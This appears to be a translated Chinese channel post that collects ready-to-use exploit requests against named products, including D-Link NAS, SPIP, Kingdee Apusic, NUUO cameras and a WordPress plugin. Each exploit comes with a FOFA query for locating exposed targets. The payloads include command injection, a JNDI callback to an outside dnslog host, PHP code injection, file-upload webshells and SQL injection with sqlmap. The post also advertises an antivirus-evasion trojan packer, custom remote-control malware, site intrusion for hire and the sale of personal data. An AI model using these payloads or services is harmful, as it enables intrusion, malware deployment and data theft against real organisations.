不够安全 (Not Secure Enough)


Feiyuxing (飞鱼星) router information disclosure vulnerability fofa:body="js/select2css.js"
127.0.0.1/js/../.htpasswd

D-Link NAS RCE (command execution) vulnerability fofa:app="D_Link-DNS-ShareCenter"
GET /cgi-bin/sc_mgr.cgi?cmd=SC_Get_Info HTTP/1.1 
Host:127.0.0.1 
Content-Length: 0 
X-Requested-With: XMLHttpRequest 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 
Accept: application/xml, text/xml, */*; q=0.01 
Content-Type: application/x-www-form-urlencoded 
Cookie: username=1234567890'& ls & echo '1234567890; 
Accept-Encoding: gzip, deflate, br 
Accept-Language: zh-CN,zh;q=0.9 
Connection: close


💖 Regarding penetration of specified sites
Our team is not currently taking orders for domestic sites

信下一代云桌面 (next-generation cloud desktop) remote command execution vulnerability fofa:body="信下一代云桌面VENGD"
POST /vesystem/index.php/New/Fn/newserver HTTP/1.1 
Host: 127.0.0.1 
Accept-Encoding: gzip 
Connection: close 
Content-Length: 118 
Content-Type: application/x-www-form-urlencoded 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 
 
ip=`ping www.dnslog.cn`&user=1&pwd=1&type=1&c_type=1&local=1&server_os_str=1&server_os_version_str=1

SQL injection in a certain clone short-video system (某仿某音短视频系统) fofa:"/public/index/images/new_logo.png"
POST /index.php?g=appapi&m=auth&a=success HTTP/1.1 
Content-Length: 158 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 
Accept-Encoding: gzip, deflate 
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 
Cache-Control: max-age=0 
Content-Type: application/x-www-form-urlencoded 
Host: 127.0.0.1 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 
sec-ch-ua: "Chromium";v="130", "Google Chrome";v="130", "Not?A_Brand";v="99" 
sec-ch-ua-mobile: ?0 
sec-ch-ua-platform: "Windows" 
sec-fetch-user: ?1 
Connection: close 
 
uid=*
python sqlmap.py -r tracy.txt --level=3 --dbms=mysql

Feedback on use of the AV-evasion tool (your vote may directly decide whether this project continues to be updated)
Anonymous voting

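💖 One-click AV-evasion trojan generator V1.0 💖 Evasion results as follows 💖
Huorong (火绒), Defender. Other antivirus products have not been tested yet; you can test them yourself
🔔 This tool is written in Go. A Go environment must be installed before using it. On first use of the tool:
go mod init packer
go get golang.org/x/sys/windows
💖 Command to generate the trojan 💖
packer.exe -f payload.bin -m all
payload.bin is the .bin file output by the controller ✔️ ‼️ The tool currently cannot bypass 360 核晶 and has no autostart capability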


SQL injection vulnerability in a certain WordPress plugin fofa:"wordpress" && body="html5-video-player"
127.0.0.1/?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-

Kingdee Apusic (金蝶天燕) remote command execution vulnerability fofa:header="Apusic"
POST /ormrpc/services/ServiceFactoryService HTTP/1.1 
Host: 127.0.0.1 
Cache-Control: max-age=0 
Upgrade-Insecure-Requests: 1 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 
Accept-Encoding: gzip, deflate, br 
Accept-Language: zh-CN,zh;q=0.9 
Cookie: EASSESSIONID=1991346249; NAPRoutID=1991346249 
Connection: close 
Content-Type: application/xml 
Soapaction: something 
Content-Length: 732 
 
<?xml version="1.0" encoding="utf-8"?> 
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:buil="http://build.antlr"> 
<soapenv:Header/> 
<soapenv:Body> 
 <buil:getService soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> 
 <environment xmlns:apachesoap="http://xml.apache.org/xml-soap" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xsi:type="apachesoap:Map"> 
  <item> 
  <key xsi:type="soapenc:string">jndiName</key> 
  <value xsi:type="soapenc:string">ldap://a5skg4.dnslog.cn</value> 
  </item> 
 </environment> 
 </buil:getService> 
</soapenv:Body> 
</soapenv:Envelope>

SPIP remote code execution vulnerability fofa:body="SPIP Blog"
POST /index.php?action=porte_plume_previsu HTTP/2 
Host: 127.0.0.1 
Cache-Control: max-age=0 
Sec-Ch-Ua: "Chromium";v="130", "Google Chrome";v="130", "Not?A_Brand";v="99" 
Sec-Ch-Ua-Mobile: ?0 
Sec-Ch-Ua-Platform: "Windows" 
Upgrade-Insecure-Requests: 1 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 
Sec-Fetch-Site: none 
Sec-Fetch-Mode: navigate 
Sec-Fetch-User: ?1 
Sec-Fetch-Dest: document 
Accept-Encoding: gzip, deflate, br 
Accept-Language: zh-CN,zh;q=0.9 
Priority: u=0, i 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 52 
 
data=AA_[<img111111>->URL`<?php system("id");?>`]_BB

NUUO camera arbitrary file upload vulnerability fofa:title="Network Video Recorder Login"
 
POST /upload.php HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36  
Content-Length: 155  
Accept-Encoding: gzip, deflate, br  
Accept-Language: zh-CN,zh;q=0.9  
Connection: close  
Content-Type: multipart/form-data; boundary=--------ok4o88lom  
accept: */*  
  
----------ok4o88lom  
Content-Disposition: form-data; name="userfile"; filename="Tracy.php"  
  
<?php phpinfo();?>  
----------ok4o88lom--

NUUO camera arbitrary file upload vulnerability fofa:title="Network Video Recorder Login"
POST /upload.php HTTP/1.1 
Host: 127.0.0.1 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 
Content-Length: 155 
Accept-Encoding: gzip, deflate, br 
Accept-Language: zh-CN,zh;q=0.9 
Connection: close 
Content-Type: multipart/form-data; boundary=--------ok4o88lom 
accept: */* 
 
----------ok4o88lom 
Content-Disposition: form-data; name="userfile"; filename="9pqs9.php" 
 
<?php phpinfo();@unlink(__FILE__);?> 
----------ok4o88lom--

Palo Alto SQL injection vulnerability fofa:icon_hash="-631559155"
POST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php HTTP/1.1 
Host: 127.0.0.1 
Content-Type: application/x-www-form-urlencoded 
  
action=import&type=test&project=pandbRBAC&signatureid=1%20AND%20(SELECT%201234%20FROM%20(SELECT(SLEEP(5)))test)

多企源 SQL injection fofa:app="多企源-基础数据支撑系统"
POST /json/checkLogin.action?usercfg.username=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1 
Host: 127.0.0.1 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36 
Accept-Encoding: gzip, deflate, br 
Accept: */* 
Accept-Language: zh-CN 
Connection: keep-alive

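💖 Penetration of specified sites 💖 💖 Custom AV-evading remote-control tools for PC 💖
Supports 360 核晶, Huorong (火绒), Tencent PC Manager (腾讯管家) and other domestic and foreign antivirus software
💖 Data for sale 💖
Not second-hand/forum/leaked data; most of it supports seeded-record (埋雷) verification
Data sales channel https://t.me/+RkeClAPD6vszY2Jk 😅 Business contact: @Tracy_clown28
All of our team's business supports 汇旺担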
